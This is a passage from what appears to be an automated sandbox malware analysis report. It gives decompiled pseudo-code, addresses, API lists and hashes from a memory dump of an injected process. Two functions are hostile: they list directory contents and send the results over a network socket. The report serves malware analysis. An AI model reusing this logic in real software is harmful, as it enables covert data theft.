							return E004338BB(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}















































                    0x0044d0fe
                    0x0044d0ff
                    0x0044d102
                    0x0044d102
                    0x0044d105
                    0x0044d105
                    0x0044d107
                    0x0044d108
                    0x0044d111
                    0x0044d112
                    0x0044d115
                    0x0044d118
                    0x0044d11d
                    0x0044d124
                    0x0044d125
                    0x0044d126
                    0x0044d129
                    0x0044d133
                    0x0044d136
                    0x0044d137
                    0x0044d139
                    0x0044d14d
                    0x0044d14d
                    0x0044d150
                    0x0044d15a
                    0x0044d15f
                    0x0044d162
                    0x0044d164
                    0x00000000
                    0x0044d166
                    0x0044d16a
                    0x0044d173
                    0x0044d179
                    0x00000000
                    0x0044d17c
                    0x0044d13b
                    0x0044d13b
                    0x0044d141
                    0x0044d146
                    0x0044d149
                    0x0044d14b
                    0x0044d182
                    0x0044d184
                    0x0044d185
                    0x0044d186
                    0x0044d187
                    0x0044d188
                    0x0044d189
                    0x0044d18e
                    0x0044d192
                    0x0044d194
                    0x0044d19a
                    0x0044d1a1
                    0x0044d1a4
                    0x0044d1a7
                    0x0044d1a8
                    0x0044d1ab
                    0x0044d1ac
                    0x0044d1af
                    0x0044d1b0
                    0x0044d1d1
                    0x0044d1d1
                    0x0044d1d3
                    0x00000000
                    0x00000000
                    0x0044d1b8
                    0x0044d1ba
                    0x0044d1bc
                    0x0044d1be
                    0x0044d1c0
                    0x0044d1c2
                    0x0044d1c4
                    0x0044d1cf
                    0x00000000
                    0x0044d1cf
                    0x0044d1c4
                    0x0044d1c0
                    0x00000000
                    0x0044d1bc
                    0x0044d1d5
                    0x0044d1d7
                    0x0044d1da
                    0x0044d1f3
                    0x0044d1f3
                    0x0044d1f5
                    0x0044d1f8
                    0x0044d208
                    0x0044d20a
                    0x0044d20a
                    0x0044d1fa
                    0x0044d1fa
                    0x0044d1fd
                    0x00000000
                    0x0044d1ff
                    0x0044d1ff
                    0x0044d202
                    0x00000000
                    0x0044d204
                    0x0044d204
                    0x0044d204
                    0x0044d202
                    0x0044d1fd
                    0x0044d210
                    0x0044d218
                    0x0044d21c
                    0x0044d22a
                    0x0044d22f
                    0x0044d244
                    0x0044d246
                    0x0044d24c
                    0x0044d24f
                    0x0044d281
                    0x0044d281
                    0x0044d283
                    0x0044d286
                    0x0044d28c
                    0x0044d28c
                    0x0044d293
                    0x0044d2ad
                    0x0044d2ad
                    0x0044d2bc
                    0x0044d2c1
                    0x0044d2c4
                    0x0044d2c6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044d295
                    0x0044d295
                    0x0044d29b
                    0x0044d29d
                    0x00000000
                    0x0044d29f
                    0x0044d29f
                    0x0044d2a2
                    0x00000000
                    0x0044d2a4
                    0x0044d2a4
                    0x0044d2ab
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044d2ab
                    0x0044d2a2
                    0x0044d29d
                    0x00000000
                    0x0044d2c8
                    0x0044d2d0
                    0x0044d2d6
                    0x0044d2d8
                    0x0044d2d8
                    0x0044d2e0
                    0x0044d2e5
                    0x0044d2ed
                    0x0044d2f0
                    0x0044d2f2
                    0x0044d306
                    0x0044d30b
                    0x0044d251
                    0x0044d251
                    0x0044d255
                    0x0044d25d
                    0x0044d25d
                    0x0044d25d
                    0x0044d25f
                    0x0044d262
                    0x0044d265
                    0x0044d265
                    0x0044d1dc
                    0x0044d1df
                    0x0044d1e1
                    0x00000000
                    0x0044d1e3
                    0x0044d1e3
                    0x0044d1e9
                    0x0044d1ee
                    0x0044d1e1
                    0x0044d272
                    0x0044d27d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044d14b
                    0x0044d11f
                    0x0044d121
                    0x0044d17d
                    0x0044d181
                    0x0044d181
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: eb39091a66b90e585f9b8de1188895b1ce3c987d0d7c23a11321f6f6f58edeb2
                    • Instruction ID: a605d271e407c9958f5ebfb9e98191da8a3e066373b5453ef71e7620c58a5f30
                    • Opcode Fuzzy Hash: eb39091a66b90e585f9b8de1188895b1ce3c987d0d7c23a11321f6f6f58edeb2
                    • Instruction Fuzzy Hash: CA313571D00209AFEB249E79CC84EEB7BBDEB86308F1401AEF819D3251E6349D408B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0045081B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E0045081B(void* __ecx, void* __edx, signed int* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				void* _t36;
				intOrPtr* _t39;
				intOrPtr* _t42;
				signed int _t48;
				void* _t51;
				void* _t52;
				signed int* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E00446A95(_t36, __ecx, __edx);
				_t48 = 2;
				_t39 =  *((intOrPtr*)(_t54 + 0x50));
				_t51 = _t39 + 2;
				do {
					_t26 =  *_t39;
					_t39 = _t39 + _t48;
				} while (_t26 != 0);
				_t42 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
				_t52 = _t42 + 2;
				do {
					_t29 =  *_t42;
					_t42 = _t42 + _t48;
				} while (_t29 != 0);
				_t53 = _a4;
				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
				_t53[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t48 = E00450917( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t48;
				_t32 = EnumSystemLocalesW(E00450943, 1);
				_t62 =  *_t53 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t53 = 0;
					return _t34;
				}
				return _t34;
			}



















                    0x00450828
                    0x0045082e
                    0x0045082f
                    0x00450832
                    0x00450835
                    0x00450835
                    0x00450838
                    0x0045083a
                    0x00450848
                    0x0045084e
                    0x00450851
                    0x00450854
                    0x00450854
                    0x00450857
                    0x00450859
                    0x00450862
                    0x0045086d
                    0x00450870
                    0x00450876
                    0x00450881
                    0x00450881
                    0x0045088a
                    0x0045088d
                    0x00450895
                    0x0045089b
                    0x0045089f
                    0x004508a4
                    0x004508a8
                    0x004508ad
                    0x004508af
                    0x00000000
                    0x004508af
                    0x004508b5

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • EnumSystemLocalesW.KERNEL32(00450943,00000001,00000000,?,m3D,?,00450F70,00000000,?,?,?), ref: 0045088D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: m3D
                    • API String ID: 1084509184-982802904
                    • Opcode ID: d13ce46db01857b44c754fc5ec7763bcb35d9ccf5c388861a977e99f0991b4a0
                    • Instruction ID: 15c25865bd57dd9ed052f6de1c9d4bc0c6d7c90143c64c40a76a96693f8e609e
                    • Opcode Fuzzy Hash: d13ce46db01857b44c754fc5ec7763bcb35d9ccf5c388861a977e99f0991b4a0
                    • Instruction Fuzzy Hash: 3E118C3B2007019FEB18AF39C8916BAB791FF80319B14883EED4647701D775B906C780
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004508B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004508B6(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t11;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				intOrPtr* _t20;
				intOrPtr _t25;
				void* _t26;
				void* _t27;

				_t27 = E00446A95(_t17, __ecx, __edx);
				_t25 = 2;
				_t20 =  *((intOrPtr*)(_t27 + 0x50));
				_t26 = _t20 + 2;
				do {
					_t11 =  *_t20;
					_t20 = _t20 + _t25;
				} while (_t11 != 0);
				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
				 *(_t27 + 0x60) = _t13;
				if(_t13 == 0) {
					_t25 = E00450917( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
				EnumSystemLocalesW(E00450B93, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}













                    0x004508c3
                    0x004508c9
                    0x004508ca
                    0x004508cd
                    0x004508d0
                    0x004508d0
                    0x004508d3
                    0x004508d5
                    0x004508e3
                    0x004508e6
                    0x004508eb
                    0x004508f6
                    0x004508f6
                    0x004508ff
                    0x00450902
                    0x00450908
                    0x0045090e
                    0x00450910
                    0x00000000
                    0x00450910
                    0x00450916

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • EnumSystemLocalesW.KERNEL32(00450B93,00000001,?,?,m3D,?,00450F34,m3D,?,?,?,?,?,0044336D,?,?), ref: 00450902
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: m3D
                    • API String ID: 1084509184-982802904
                    • Opcode ID: 26991cba7bbc86e1919f10754b8b785b2ecdf25adbba73174a712f5d5bc6d13d
                    • Instruction ID: 5dea69f9d697fc4293d0711e1b08fce8c3201d78217ba2bcd737ffac06997e55
                    • Opcode Fuzzy Hash: 26991cba7bbc86e1919f10754b8b785b2ecdf25adbba73174a712f5d5bc6d13d
                    • Instruction Fuzzy Hash: A5F0283A3003055FDB146F359C81A66BB95EF81759F15883EFD418B642D675AC018744
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044716D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00442DCB,?,00000004), ref: 004471C0
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: 2c80f62870bc465dbeaf3c9209bb9ced0744fbcbc410adbe038e870c8c2fc236
                    • Instruction ID: 1399f742e217acd12c1245ecdfc534ed39672f07150ba9ee3c651a9906310cab
                    • Opcode Fuzzy Hash: 2c80f62870bc465dbeaf3c9209bb9ced0744fbcbc410adbe038e870c8c2fc236
                    • Instruction Fuzzy Hash: 3BF0F031A44208BBDB11AF61DC06F6E7F65EF08701F00406AFC0966292CB798E15DAAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00418650 Relevance: 3.2, APIs: 2, Instructions: 245fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E00418650(char* __edx, void* __eflags, char _a8) {
				struct _WIN32_FIND_DATAW _v1028;
				char _v1036;
				char _v1064;
				char _v1088;
				void* _v1092;
				char _v1100;
				char _v1116;
				void* _v1120;
				char _v1128;
				char _v1136;
				char _v1152;
				char _v1156;
				char _v1160;
				void* _v1164;
				char _v1172;
				char _v1176;
				void* _v1188;
				char _v1196;
				void* _v1200;
				void* _v1204;
				char _v1208;
				char _v1220;
				char _v1224;
				char _v1228;
				char _v1232;
				char _v1236;
				char _v1240;
				char _v1252;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t63;
				int _t85;
				int _t91;
				void* _t102;
				void* _t109;
				char* _t113;
				void* _t115;
				void* _t116;
				void* _t130;
				void* _t133;
				void* _t228;
				void* _t229;
				void* _t234;
				signed int _t235;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t243;

				_t243 = __eflags;
				_t213 = __edx;
				_push(_t139);
				_t63 = E00401F8B( &_a8);
				E00404182( &_a8,  &_v1100, 4, 0xffffffff);
				_t238 = (_t235 & 0xfffffff8) - 0x4b4;
				E004020D6(_t139, _t238, __edx, _t243, 0x472ec8);
				_t239 = _t238 - 0x18;
				E004020D6(_t139, _t239, __edx, _t243,  &_v1116);
				E0041A976( &_v1252, _t213);
				_t240 = _t239 + 0x30;
				_t228 =  *_t63 - 0x19;
				if(_t228 == 0) {
					E004020BF(_t139,  &_v1220);
					_t213 = 0x473618;
					E004087F0( &_v1172, 0x473618, _t234, L"\\*");
					_t229 = FindFirstFileW(E00401EE4( &_v1172),  &_v1028);
					__eflags = _t229 - 0xffffffff;
					if(__eflags == 0) {
						L14:
						E004020D6(_t139, _t240 - 0x18, _t213, __eflags,  &_v1220);
						_push(0x5d);
						E00404A81(0x4737a0, _t213, __eflags);
						E00401EE9();
						E00401FB8();
						goto L15;
					}
					E0040415E(_t139,  &_v1196, 0x473618, _t234,  &(_v1028.cFileName));
					_t213 = 0x4644f0;
					_t85 = E00406E2B(__eflags);
					_t139 = _t85;
					E00401EE9();
					__eflags = _t85;
					if(__eflags != 0) {
						E00401FC2( &_v1228, 0x4644f0, _t229, E00402097(_t139,  &_v1196, 0x4644f0, _t234, __eflags,  &_v1028, 0x250));
						E00401FB8();
					}
					while(1) {
						__eflags = FindNextFileW(_t229,  &_v1028);
						if(__eflags == 0) {
							goto L14;
						}
						E0040415E(_t139,  &_v1196, _t213, _t234,  &(_v1028.cFileName));
						_t213 = L"..";
						_t91 = E00406E2B(__eflags);
						_t139 = _t91;
						E00401EE9();
						__eflags = _t91;
						if(__eflags != 0) {
							L00403356(E00402097(_t139,  &_v1196, L"..", _t234, __eflags,  &_v1028, 0x250));
							E00401FB8();
						}
					}
					goto L14;
				} else {
					_t245 = _t228 == 1;
					if(_t228 == 1) {
						_t102 = E0041A7B9( &_v1152, E00401E45( &_v1232, _t213, _t234, _t245, 1));
						E00402F85( &_v1176, E004087F0( &_v1128, 0x473618, _t234, "\\"), _t102);
						E00401EE9();
						E00401EE9();
						E004020BF(_t139,  &_v1224);
						E00401EE4( &_v1176);
						_t213 =  &_v1224;
						_t109 = E0041ADFE( &_v1224);
						_t246 = _t109;
						if(_t109 != 0) {
							_t113 = E00401F8B(E00401E45(0x473298,  &_v1224, _t234, _t246, 0x1b));
							_t247 =  *_t113 - 1;
							if( *_t113 == 1) {
								_t130 = E0040245C();
								E0040632B( &_v1028, E00401F8B(0x473280), _t130);
								_t133 = E0040245C();
								E00401FC2( &_v1240, _t213, 0x473280, E0040644C(_t139,  &_v1036, _t213,  &_v1156, E00401F8B( &_v1228), _t133));
								E00401FB8();
							}
							_t115 = E00401E45( &_v1232, _t213, _t234, _t247, 2);
							_t116 = E00401E45( &_v1236, _t213, _t234, _t247, 0);
							_t213 = E00402EF0(_t139,  &_v1160, E00402EF0(_t139,  &_v1136, E00402EF0(_t139,  &_v1088, E00402EF0(_t139,  &_v1064, E00402F11( &_v1208, E00401E45( &_v1240, _t213, _t234, _t247, 1), _t234, 0x472ec8), _t234, _t247, _t116), _t234, _t247, 0x472ec8), _t234, _t247, _t115), _t234, _t247, 0x472ec8);
							E00402EF0(_t139, _t240 - 0x18, _t122, _t234, _t247,  &_v1220);
							_push(0x5e);
							E00404A81(0x4737a0, _t122, _t247);
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
						}
						E00401FB8();
						E00401EE9();
					}
					L15:
					E00401E6D( &_v1232, _t213);
					E00401FB8();
					return E00401FB8();
				}
			}




















































                    0x00418650
                    0x00418650
                    0x0041865f
                    0x00418662
                    0x00418678
                    0x0041867d
                    0x00418688
                    0x0041868d
                    0x0041869a
                    0x004186a3
                    0x004186a8
                    0x004186ab
                    0x004186ae
                    0x0041887b
                    0x00418885
                    0x0041888e
                    0x004188ac
                    0x004188ae
                    0x004188b1
                    0x00418978
                    0x00418982
                    0x00418987
                    0x0041898e
                    0x00418997
                    0x004189a0
                    0x00000000
                    0x004189a0
                    0x004188c3
                    0x004188c8
                    0x004188cf
                    0x004188d8
                    0x004188da
                    0x004188df
                    0x004188e1
                    0x004188fe
                    0x00418907
                    0x00418907
                    0x00418969
                    0x00418974
                    0x00418976
                    0x00000000
                    0x00000000
                    0x00418920
                    0x00418925
                    0x0041892c
                    0x00418935
                    0x00418937
                    0x0041893c
                    0x0041893e
                    0x0041895b
                    0x00418964
                    0x00418964
                    0x0041893e
                    0x00000000
                    0x004186b4
                    0x004186b4
                    0x004186b7
                    0x004186ce
                    0x004186f1
                    0x004186fb
                    0x00418704
                    0x0041870d
                    0x00418716
                    0x0041871b
                    0x00418721
                    0x00418726
                    0x00418728
                    0x0041873c
                    0x00418741
                    0x00418744
                    0x0041874d
                    0x00418762
                    0x0041876b
                    0x00418791
                    0x0041879a
                    0x0041879a
                    0x004187b0
                    0x004187bd
                    0x00418817
                    0x0041881b
                    0x00418821
                    0x00418828
                    0x00418831
                    0x0041883a
                    0x00418846
                    0x00418852
                    0x0041885b
                    0x0041885b
                    0x00418864
                    0x0041886d
                    0x0041886d
                    0x004189a5
                    0x004189a9
                    0x004189b5
                    0x004189c8
                    0x004189c8

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?), ref: 004188A6
                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418972
                      • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$CreateFirstNext
                    • String ID:
                    • API String ID: 341183262-0
                    • Opcode ID: a8866b442efc8a751d2068498eb88e5b87138e0a566161d5edc2bb9b37029738
                    • Instruction ID: 4e170b996662dc82c888af41f7fe9c50681d869d22ff8177fab8d840ae628c7b
                    • Opcode Fuzzy Hash: a8866b442efc8a751d2068498eb88e5b87138e0a566161d5edc2bb9b37029738
                    • Instruction Fuzzy Hash: C68162715082415BC314FB62C896DEFB3A9AF90308F50493FF546631E2EF389A49C69E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406EB0 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E00406EB0(char _a4) {
				void* _v16;
				struct _WIN32_FIND_DATAW _v596;
				char _v620;
				void* _v632;
				char _v644;
				void* _v648;
				char _v652;
				void* _v656;
				char _v668;
				char _v676;
				void* _v700;
				void* __ebx;
				void* __esi;
				void* __ebp;
				int _t29;
				void* _t34;
				void* _t49;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t74 = FindFirstFileW(E00401EE4( &_a4),  &_v596);
				_t80 = _t74 - 0xffffffff;
				if(_t74 != 0xffffffff) {
					E004020BF(_t49,  &_v668);
					E0040415E(_t49,  &_v644, _t71, _t75,  &(_v596.cFileName));
					_t72 = 0x4644f0;
					_t29 = E00406E2B(__eflags);
					_t50 = _t29;
					E00401EE9();
					__eflags = _t29;
					if(__eflags != 0) {
						E00401FC2( &_v676, 0x4644f0, _t74, E00402097(_t50,  &_v644, 0x4644f0, 0x250, __eflags,  &_v596, 0x250));
						L5:
						E00401FB8();
					}
					__eflags = FindNextFileW(_t74,  &_v596);
					if(__eflags != 0) {
						_t34 = E00402097(_t50,  &_v620, _t72, 0x250, __eflags,  &_v596, 0x250);
						_t72 =  &_v676;
						E00401FC2( &_v676,  &_v676, _t74, E004087CF(_t50,  &_v652,  &_v676, 0x250, __eflags, _t34));
						E00401FB8();
						goto L5;
					}
					E004020D6(_t50, _t77 - 0x18, _t72, __eflags,  &_v668);
					_push(0x50);
					E00404A81(0x472fc0, _t72, __eflags);
					E00401FB8();
				} else {
					E0041A879(_t49, _t77 - 0x18,  &_a4);
					_push(0x54);
					E00404A81(0x472fc0,  &_a4, _t80);
				}
				return E00401EE9();
			}
























                    0x00406ed1
                    0x00406ed3
                    0x00406ed6
                    0x00406efe
                    0x00406f0f
                    0x00406f14
                    0x00406f1b
                    0x00406f24
                    0x00406f26
                    0x00406f30
                    0x00406f32
                    0x00406f48
                    0x00406f88
                    0x00406f88
                    0x00406f88
                    0x00406f99
                    0x00406f9b
                    0x00406f5d
                    0x00406f63
                    0x00406f76
                    0x00406f7f
                    0x00000000
                    0x00406f84
                    0x00406fa7
                    0x00406fac
                    0x00406fb3
                    0x00406fbc
                    0x00406ed8
                    0x00406ee4
                    0x00406ee9
                    0x00406ef0
                    0x00406ef0
                    0x00406fd6

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ECB
                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406F93
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNextsend
                    • String ID:
                    • API String ID: 4113138495-0
                    • Opcode ID: 118ed55c94b13efcbfdda2ea5d541ec650089f94d2f4392e937ce07913bff842
                    • Instruction ID: da33ce525bc8868546fe2e6bcae83f091993c6b7fab0c7b7f9de5ed664394571
                    • Opcode Fuzzy Hash: 118ed55c94b13efcbfdda2ea5d541ec650089f94d2f4392e937ce07913bff842
                    • Instruction Fuzzy Hash: F92143311043015BC714FB61DD96DEFB7ACEF90358F400A3EF596621D1EF389A09865A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00450B93 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E00450B93(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebp;
				signed int _t16;
				signed int _t22;
				void* _t24;
				void* _t31;
				void* _t35;
				signed int* _t50;
				int _t53;
				signed int _t54;

				_t16 =  *0x46f00c; // 0x54ba778e
				_v8 = _t16 ^ _t54;
				_t35 = E00446A95(__ebx, __ecx, __edx);
				_t50 =  *(E00446A95(_t35, __ecx, __edx) + 0x34c);
				_t53 = E00450C6B(_a4);
				asm("sbb ecx, ecx");
				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t22 != 0) {
					_t24 = E00452294(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
					if(_t24 != 0) {
						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
							_t31 = E00452294(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
							if(_t31 == 0) {
								_push(_t50);
								_push(_t31);
								goto L9;
							}
						}
					} else {
						if( *(_t35 + 0x60) != _t24) {
							L10:
							 *_t50 =  *_t50 | 0x00000004;
							_t50[1] = _t53;
							_t50[2] = _t53;
						} else {
							_push(_t50);
							_push(1);
							L9:
							_push(_t53);
							if(E00450DC3(_t35) != 0) {
								goto L10;
							}
						}
					}
				} else {
					 *_t50 =  *_t50 & _t22;
				}
				return E004338BB(_v8 ^ _t54);
			}














                    0x00450b9e
                    0x00450ba5
                    0x00450bb3
                    0x00450bbb
                    0x00450bca
                    0x00450bd6
                    0x00450be7
                    0x00450bef
                    0x00450c00
                    0x00450c09
                    0x00450c19
                    0x00450c2b
                    0x00450c34
                    0x00450c36
                    0x00450c37
                    0x00000000
                    0x00450c37
                    0x00450c34
                    0x00450c0b
                    0x00450c0e
                    0x00450c45
                    0x00450c45
                    0x00450c48
                    0x00450c4b
                    0x00450c10
                    0x00450c10
                    0x00450c11
                    0x00450c38
                    0x00450c38
                    0x00450c43
                    0x00000000
                    0x00000000
                    0x00450c43
                    0x00450c0e
                    0x00450bf1
                    0x00450bf1
                    0x00450bf3
                    0x00450c68

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450BE7
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    • String ID:
                    • API String ID: 1663032902-0
                    • Opcode ID: 4597e0029ea091ecb2ebf5e98482b9f6fcb85861c7a3cfe2c1e922654fb1815e
                    • Instruction ID: d6adf83c33703ae5228b67ec7a49f9fec95c79c937f4ddcaaa5f3f490f6395be
                    • Opcode Fuzzy Hash: 4597e0029ea091ecb2ebf5e98482b9f6fcb85861c7a3cfe2c1e922654fb1815e
                    • Instruction Fuzzy Hash: DB21D6365002069BDB2D9F25DC42A7773ACEB06316F1001BBFD05D6242EB78ED88CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00450DC3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00450DC3(void* __ebx, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t24;
				signed int _t27;
				intOrPtr* _t29;

				_push(_t16);
				_t8 = E00446A95(__ebx, _t16, _t22);
				_t27 = _a4;
				_t24 = _t8;
				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
					if(_t27 == _v8 || _a8 == 0) {
						L7:
						_t12 = 1;
					} else {
						_t29 =  *((intOrPtr*)(_t24 + 0x50));
						_t20 = _t29 + 2;
						do {
							_t13 =  *_t29;
							_t29 = _t29 + 2;
						} while (_t13 != 0);
						if(E00450917( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
							goto L1;
						} else {
							goto L7;
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				return _t12;
			}















                    0x00450dc8
                    0x00450dcb
                    0x00450dd0
                    0x00450dd3
                    0x00450df7
                    0x00450e00
                    0x00450e2a
                    0x00450e2c
                    0x00450e08
                    0x00450e08
                    0x00450e0b
                    0x00450e0e
                    0x00450e0e
                    0x00450e11
                    0x00450e14
                    0x00450e28
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00450e28
                    0x00450df9
                    0x00450df9
                    0x00450df9
                    0x00450df9
                    0x00450e32

                    APIs
